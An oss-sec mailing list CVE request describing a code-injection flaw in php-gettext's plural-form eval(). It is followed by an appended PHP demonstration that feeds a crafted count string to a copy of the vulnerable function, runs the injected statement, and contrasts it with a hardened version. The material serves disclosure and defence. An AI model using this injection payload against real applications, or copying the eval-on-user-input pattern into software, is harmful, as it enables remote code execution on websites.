oss-sec mailing list archives

CVE Request: php-gettext: Arbitrary code execution in select_string, ngettext and npgettext count parameter


From: Salvatore Bonaccorso <carnil () debian org>
Date: Tue, 17 Jan 2017 19:34:20 +0100

Hi

Could you please assign a CVE to the following php-gettext[0] issue:

From [1]:
A code injection vulnerability was found in php-gettext. Evaluating
the plural form formula in ngettext family of calls can execute
arbitrary code if number is passed unsanitized from the untrusted
user.

Which in Fedora was addressed by updating to 1.0.12, cf [2]. Original
report is found in [3]:
CERT ID - VU#520504 (pending since 2015)
Product - php-gettext
Company - Danilo Segan
Name - php-gettext php code execution
Versions - <1.0.12
Patched - 11/11/2015
Ref: https://launchpad.net/php-gettext/trunk/1.0.12

Vulnerability - "code injection into the ngettext family of calls:
evaluating the plural form formula can execute arbitrary code if
number is passed unsanitized from the untrusted user."

Description -
In 1.0.11 and lower the select_string function appears as the
following:

  /**
   * Detects which plural form to take
   *
   * @access private
   * @param n count
   * @return int array index of the right plural form
   */
  function select_string($n) {
    $string = $this->get_plural_forms();
    $string = str_replace('nplurals',"\$total",$string);
    $string = str_replace("n",$n,$string);
    $string = str_replace('plural',"\$plural",$string);
    $total = 0;
    $plural = 0;
    eval("$string");
    if ($plural >= $total) $plural = $total - 1;
    return $plural;
  }

The vulnerability here lies in the fact that $string is evaluated as
PHP code. If the plural form contains an 'n', and the $n parameter
is exposed to a malicious user, PHP code can be added to the value
of $string before it is evaluated. For websites, this means that a
vulnerable application could allow an attacker to run PHP code on
your site and potentially gain control of it.


The $n parameter in select_string can also be exposed through
ngettext and npgettext as the $number parameter.


The new release 1.0.12 was made available shortly after notification
in 2015 and resolves the issue by raising an exception during
non-numeric input to these parameters.

 [0] https://launchpad.net/php-gettext/
 [1] https://bugzilla.redhat.com/show_bug.cgi?id=1367462
 [2] https://lwn.net/Alerts/708838/
 [3] http://seclists.org/fulldisclosure/2016/Aug/76

 Regards,
 Salvatore
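
The following PHP is an added demonstration of the issue described above; it is not part of this mail and not php-gettext's own code. It reproduces the substitution-then-eval sequence of select_string() from 1.0.11 against a constructed Plural-Forms header, shows how a string count reaching that path executes attacker-supplied PHP, and pairs it with a hardened variant that rejects non-integer counts before eval(), in the spirit of the 1.0.12 fix (the exact check and exception used by 1.0.12 are assumptions here). The class names and the `$GLOBALS['marker']` payload are illustrative.

```php
<?php
// Added example (not php-gettext code): stand-in for select_string() as it
// appears in php-gettext <= 1.0.11, plus a hardened variant. The Plural-Forms
// header below is constructed sample input (the usual English one).

class VulnerablePluralSelector {
    private $plural_forms;

    public function __construct($plural_forms) {
        $this->plural_forms = $plural_forms;
    }

    // Same substitution/eval sequence as 1.0.11's select_string().
    public function select_string($n) {
        $string = $this->plural_forms;
        $string = str_replace('nplurals', "\$total", $string);
        $string = str_replace("n", $n, $string);   // $n is spliced into PHP source unescaped
        $string = str_replace('plural', "\$plural", $string);
        $total = 0;
        $plural = 0;
        eval("$string");                           // executes whatever $n carried
        if ($plural >= $total) $plural = $total - 1;
        return $plural;
    }
}

class HardenedPluralSelector extends VulnerablePluralSelector {
    // Refuse anything that is not an integer before it can reach eval().
    // (Assumed shape of the 1.0.12 fix: the report says it raises an exception
    // on non-numeric input; the exact type and message are not quoted above.)
    public function select_string($n) {
        if (!is_int($n)) {
            throw new InvalidArgumentException(
                "select_string() only accepts integers, got: " . var_export($n, true));
        }
        return parent::select_string($n);
    }
}

// Constructed sample: the Plural-Forms header of an English catalog.
$header = "nplurals=2; plural=n != 1;";

// Benign use: integer counts select the singular or plural form.
$vuln = new VulnerablePluralSelector($header);
echo "form for 1: ", (int)$vuln->select_string(1), "\n";
echo "form for 5: ", (int)$vuln->select_string(5), "\n";

// Malicious use: the count arrives as a string straight from a request, e.g.
// ngettext('%d file', '%d files', $_GET['count']). After substitution the
// evaluated source reads:
//   $total=2; $plural=0; $GLOBALS['marker'] = 'attacker code ran'; 0 != 1;
// The payload must avoid the literal 'plural', which is rewritten afterwards.
$payload = "0; \$GLOBALS['marker'] = 'attacker code ran'; 0";
$vuln->select_string($payload);
echo "marker: ", $GLOBALS['marker'], "\n";   // the injected statement executed

// Hardened variant: the same payload never reaches eval().
$safe = new HardenedPluralSelector($header);
try {
    $safe->select_string($payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Callers that take counts from user input should also cast at the call site,
// e.g. ngettext(..., (int)$_GET['count']), so only an integer is ever passed.
echo "form for (int)'5': ", (int)$safe->select_string((int)"5"), "\n";
```

Two points worth noting when auditing a deployment: the `str_replace("n", ...)` step rewrites every `n` in the header, not just the variable, so any Plural-Forms expression containing the letter is affected, and the vulnerable return value is whatever the expression yields (a boolean for `n != 1`), which is why the demo casts it for display. Casting at the ngettext/npgettext call site is the cheapest mitigation for applications that cannot upgrade to 1.0.12 immediately.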

